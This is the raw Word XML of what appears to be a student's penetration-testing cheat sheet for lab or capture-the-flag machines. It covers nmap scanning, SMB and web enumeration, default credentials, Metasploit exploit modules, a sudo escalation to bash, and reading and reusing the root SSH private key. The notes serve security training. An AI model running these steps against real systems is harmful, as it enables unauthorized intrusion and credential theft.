      </w:r>
    </w:p>
    <w:p w14:paraId="2267BBD8" w14:textId="77777777" w:rsidR="00D32CC6" w:rsidRDefault="00D32CC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501BD929" w14:textId="77777777" w:rsidR="00A1055B" w:rsidRPr="00D32CC6" w:rsidRDefault="00A1055B" w:rsidP="00D32CC6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DBD8AC" w14:textId="00F98D25" w:rsidR="00D32CC6" w:rsidRPr="00170936" w:rsidRDefault="00D32CC6" w:rsidP="00170936">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00170936">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Written Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51591C44" w14:textId="54BF1307" w:rsidR="006858D0" w:rsidRPr="00AF4838" w:rsidRDefault="00AF4838" w:rsidP="000A029B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4838">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Basic Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149E283" w14:textId="79EB51F6" w:rsidR="00AF4838" w:rsidRDefault="00AF4838" w:rsidP="00AF4838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AF4838">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4838">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Grab the Banner</w:t>
      </w:r>
      <w:r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1F24C703" w14:textId="5BEBA81F" w:rsidR="00AF4838" w:rsidRPr="00AF4838" w:rsidRDefault="00AF4838" w:rsidP="00AF4838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Service Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4838">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F38858" w14:textId="695A5EE1" w:rsidR="00AF4838" w:rsidRDefault="00AF4838" w:rsidP="00AF4838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Nmap -sV -p 8080 &lt;IP&gt; (</w:t>
      </w:r>
      <w:r w:rsidR="00985F42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service Scan on Port 8080</w:t>
      </w:r>
      <w:r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5AA8B71D" w14:textId="38672508" w:rsidR="00985F42" w:rsidRDefault="00985F42" w:rsidP="00AF4838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Nmap -sV -p- &lt;IP&gt; (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service Scan on all Ports</w:t>
      </w:r>
      <w:r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53B455E3" w14:textId="29750E71" w:rsidR="00AF4838" w:rsidRDefault="00C83194" w:rsidP="002568E4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C83194">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -N -L </w:t>
      </w:r>
      <w:r w:rsidR="00C141A7" w:rsidRPr="00C141A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\\\\&lt;IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00C141A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C141A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Show all the users connected on that SMB IP</w:t>
      </w:r>
      <w:r w:rsidR="00C141A7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5E905FDA" w14:textId="332655A1" w:rsidR="00C83194" w:rsidRDefault="00C83194" w:rsidP="002568E4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C83194">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -U bob </w:t>
      </w:r>
      <w:r w:rsidR="00C141A7" w:rsidRPr="00C141A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\\\\&lt;IP&gt;\\users</w:t>
      </w:r>
      <w:r w:rsidR="00C141A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C141A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Connect to a Specific User</w:t>
      </w:r>
      <w:r w:rsidR="00C141A7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3ADB2164" w14:textId="4F9A71A1" w:rsidR="00C83194" w:rsidRDefault="00C83194" w:rsidP="002568E4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Password: Welcome1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7A0DB" w14:textId="53C6F9F6" w:rsidR="00964D99" w:rsidRPr="00AF4838" w:rsidRDefault="00964D99" w:rsidP="00964D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Web Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4838">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73060C32" w14:textId="458C37F7" w:rsidR="00964D99" w:rsidRDefault="00964D99" w:rsidP="00964D99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964D99">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster dir -u &lt;http://&lt;IP&gt; -w /usr/share/wordlists/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4BEB61" w14:textId="10F710E4" w:rsidR="00964D99" w:rsidRDefault="00964D99" w:rsidP="00964D99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Visit &lt;IP&gt;/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714FB100" w14:textId="64BCDE38" w:rsidR="00964D99" w:rsidRDefault="00964D99" w:rsidP="00964D99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Go to the Admin Panel and Inspect the Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA602AE" w14:textId="66844C5E" w:rsidR="00964D99" w:rsidRDefault="00964D99" w:rsidP="00964D99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Username: admin</w:t>
      </w:r>
      <w:r w:rsidR="00574E87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574E87"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Password: password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B6377A" w14:textId="6F9AAC57" w:rsidR="00995998" w:rsidRPr="00AF4838" w:rsidRDefault="00756C4B" w:rsidP="00995998">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Public Exploits</w:t>
      </w:r>
      <w:r w:rsidR="00995998" w:rsidRPr="00AF4838">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567B2D0B" w14:textId="47CA2501" w:rsidR="00995998" w:rsidRDefault="00995998" w:rsidP="00995998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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C728DC8" w14:textId="508C6BD1" w:rsidR="00995998" w:rsidRDefault="00995998" w:rsidP="00964D99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search simple backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611199A" w14:textId="461CF3F8" w:rsidR="002E5A20" w:rsidRDefault="002E5A20" w:rsidP="00964D99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use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC84A42" w14:textId="32737621" w:rsidR="002E5A20" w:rsidRDefault="002E5A20" w:rsidP="00964D99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set RHOST=&lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12879AD8" w14:textId="45F18D21" w:rsidR="002E5A20" w:rsidRDefault="002E5A20" w:rsidP="00964D99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set RPORT=&lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0014E" w14:textId="2904F4FD" w:rsidR="002E5A20" w:rsidRDefault="002E5A20" w:rsidP="002A6068">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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set FILEPATH=/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994DBF8" w14:textId="694C2E48" w:rsidR="0006153B" w:rsidRPr="00AF4838" w:rsidRDefault="0006153B" w:rsidP="0006153B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4838">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC7B148" w14:textId="051117BF" w:rsidR="0006153B" w:rsidRDefault="0006153B" w:rsidP="0006153B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sudo -u user2 /bin/bash (</w:t>
      </w:r>
      <w:r w:rsidRPr="0006153B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Connect to User2 through /bin/bash</w:t>
      </w:r>
      <w:r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3E374668" w14:textId="4FB5CC72" w:rsidR="0006153B" w:rsidRDefault="0006153B" w:rsidP="00964D99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cat </w:t>
      </w:r>
      <w:r w:rsidRPr="0006153B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/root/.ssh/id_rsa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(</w:t>
      </w:r>
      <w:r w:rsidRPr="0006153B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Read the RSA Authentication Key</w:t>
      </w:r>
      <w:r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0C71111A" w14:textId="17ABB9CD" w:rsidR="0006153B" w:rsidRDefault="0006153B" w:rsidP="00964D99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exit (Ctrl+d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203B973" w14:textId="60073DA0" w:rsidR="0006153B" w:rsidRDefault="0006153B" w:rsidP="00964D99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vim id_rsa </w:t>
      </w:r>
      <w:r w:rsidRPr="0006153B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/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Paste the content on id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D40463" w14:textId="578DF9CD" w:rsidR="00720D11" w:rsidRDefault="0006153B" w:rsidP="00246DE4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ssh root@&lt;IP&gt; -p &lt;PORT&gt; -i id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB51D1D" w14:textId="77777777" w:rsidR="00720D11" w:rsidRDefault="00720D1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2AE969D6" w14:textId="77777777" w:rsidR="004B069D" w:rsidRPr="00720D11" w:rsidRDefault="004B069D" w:rsidP="00720D11">
      <w:p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3E38F603" w14:textId="69B24A5F" w:rsidR="00C46EF2" w:rsidRPr="00246DE4" w:rsidRDefault="00C46EF2" w:rsidP="00C46EF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Knowledge Check</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46EF2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC0DB4" w14:textId="0E52E6F3" w:rsidR="00246DE4" w:rsidRPr="00301D77" w:rsidRDefault="00EF7DBC" w:rsidP="00246DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Nmap -sV -sC -v -p 22,80 &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72B858" w14:textId="76DF8D70" w:rsidR="00301D77" w:rsidRDefault="00301D77" w:rsidP="00301D77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964D99">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir -u &lt;http://&lt;IP&gt; -w </w:t>
      </w:r>
      <w:r w:rsidRPr="00301D77">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941FA3E" w14:textId="77FBD5F9" w:rsidR="00301D77" w:rsidRDefault="00301D77" w:rsidP="00301D77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go to &lt;IP&gt;/data/users/admin.xml </w:t>
      </w:r>
      <w:r w:rsidRPr="00301D77">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/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username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0637C715" w14:textId="3A8DE94B" w:rsidR="00301D77" w:rsidRDefault="00301D77" w:rsidP="00301D77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SHA1 Decrypt the Password to get password: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713BA36E" w14:textId="33376C2B" w:rsidR="00720D11" w:rsidRDefault="00720D11" w:rsidP="00301D77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Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696C4C7" w14:textId="785865FB" w:rsidR="00720D11" w:rsidRDefault="006679DB" w:rsidP="00301D77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Search getsimple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D3BCD" w14:textId="77A9B81A" w:rsidR="00C171DD" w:rsidRDefault="00C171DD" w:rsidP="00301D77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Use 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508B734" w14:textId="413948A3" w:rsidR="00C171DD" w:rsidRDefault="00C171DD" w:rsidP="00301D77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Set rhost, rport, lhost</w:t>
      </w:r>
      <w:r w:rsidR="00294B36">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA45F2B" w14:textId="2E4B41A7" w:rsidR="00294B36" w:rsidRDefault="00294B36" w:rsidP="00301D77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Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19328ABF" w14:textId="4C47A749" w:rsidR="00294B36" w:rsidRDefault="00294B36" w:rsidP="00301D77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Cat /user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E986F7" w14:textId="2693A33F" w:rsidR="00294B36" w:rsidRDefault="00294B36" w:rsidP="00301D77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Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011831CB" w14:textId="6DFB9F20" w:rsidR="00294B36" w:rsidRDefault="00294B36" w:rsidP="00301D77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Sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69148A54" w14:textId="07E8A3B2" w:rsidR="00294B36" w:rsidRPr="00301D77" w:rsidRDefault="00294B36" w:rsidP="00301D77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Cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C845D9D" w14:textId="77777777" w:rsidR="00C46EF2" w:rsidRPr="00C46EF2" w:rsidRDefault="00C46EF2" w:rsidP="00C46EF2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1609BA7D" w14:textId="765F5FAB" w:rsidR="002A6068" w:rsidRPr="0050627F" w:rsidRDefault="002A6068" w:rsidP="0050627F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2A6068" w:rsidRPr="0050627F" w:rsidSect="000D648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altName w:val="Castellar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1C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F38AAD6"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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6336"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="962CA92E"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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54357"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC440F90"/>
    <w:lvl w:ilvl="0" w:tplc="51AA3ACC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94DA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C68EC6C6"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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15D63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54BC33DE"/>
    <w:lvl w:ilvl="0" w:tplc="3148DC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E821CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5226F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10708"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC440F90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35B7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7E2C5DE"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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B58EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60287C3A"/>
    <w:lvl w:ilvl="0" w:tplc="8B163F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347F15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58726912"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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664B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBC096C8"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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5206F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B1C03D8"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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40FAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8FA78EE"/>
    <w:lvl w:ilvl="0" w:tplc="8B163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432283">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1503081333">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1240560893">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1597132448">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1644387383">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="240338000">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1232694238">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="977030582">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1881741241">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1492067423">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1746950644">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="560602463">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1881356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8C"/>
    <w:rsid w:val="0006153B"/>
    <w:rsid w:val="00096C22"/>
    <w:rsid w:val="000A029B"/>
    <w:rsid w:val="000A1364"/>
    <w:rsid w:val="000D6486"/>
    <w:rsid w:val="00170936"/>
    <w:rsid w:val="00190991"/>
    <w:rsid w:val="001B47AB"/>
    <w:rsid w:val="00246DE4"/>
    <w:rsid w:val="00294B36"/>
    <w:rsid w:val="002A6068"/>
    <w:rsid w:val="002D1EC6"/>
    <w:rsid w:val="002E2D32"/>
    <w:rsid w:val="002E5A20"/>
    <w:rsid w:val="002F313B"/>
    <w:rsid w:val="00301D77"/>
    <w:rsid w:val="00314670"/>
    <w:rsid w:val="00321189"/>
    <w:rsid w:val="00357FDC"/>
    <w:rsid w:val="00367CD7"/>
    <w:rsid w:val="003F1C76"/>
    <w:rsid w:val="00491547"/>
    <w:rsid w:val="004B069D"/>
    <w:rsid w:val="0050627F"/>
    <w:rsid w:val="00574E87"/>
    <w:rsid w:val="00580A6D"/>
    <w:rsid w:val="005A5B70"/>
    <w:rsid w:val="005F20EF"/>
    <w:rsid w:val="006679DB"/>
    <w:rsid w:val="006858D0"/>
    <w:rsid w:val="006D15D9"/>
    <w:rsid w:val="00720D11"/>
    <w:rsid w:val="007479AF"/>
    <w:rsid w:val="00756C4B"/>
    <w:rsid w:val="007A0351"/>
    <w:rsid w:val="00832C4E"/>
    <w:rsid w:val="00893E33"/>
    <w:rsid w:val="00964D99"/>
    <w:rsid w:val="00965241"/>
    <w:rsid w:val="0098153A"/>
    <w:rsid w:val="00985F42"/>
    <w:rsid w:val="00995998"/>
    <w:rsid w:val="00A1055B"/>
    <w:rsid w:val="00A90364"/>
    <w:rsid w:val="00AF4838"/>
    <w:rsid w:val="00B31436"/>
    <w:rsid w:val="00B71D8C"/>
    <w:rsid w:val="00BC6714"/>
    <w:rsid w:val="00C10178"/>
    <w:rsid w:val="00C141A7"/>
    <w:rsid w:val="00C171DD"/>
    <w:rsid w:val="00C20884"/>
    <w:rsid w:val="00C46EF2"/>
    <w:rsid w:val="00C83194"/>
    <w:rsid w:val="00C83AB8"/>
    <w:rsid w:val="00CA60B9"/>
    <w:rsid w:val="00CC24A9"/>
    <w:rsid w:val="00CD7A42"/>
    <w:rsid w:val="00D16451"/>
    <w:rsid w:val="00D32CC6"/>
    <w:rsid w:val="00E01F66"/>
    <w:rsid w:val="00E650A0"/>
    <w:rsid w:val="00EB1380"/>
    <w:rsid w:val="00EF7DBC"/>
    <w:rsid w:val="00F94388"/>
    <w:rsid w:val="00FB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DE9B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{95E19698-D9D1-43D7-9FEB-F80414D3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مايكل مدحت منير لوكا</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>مايكل مدحت منير لوكا</cp:lastModifiedBy>
  <cp:revision>64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-07T09:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-08T11:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>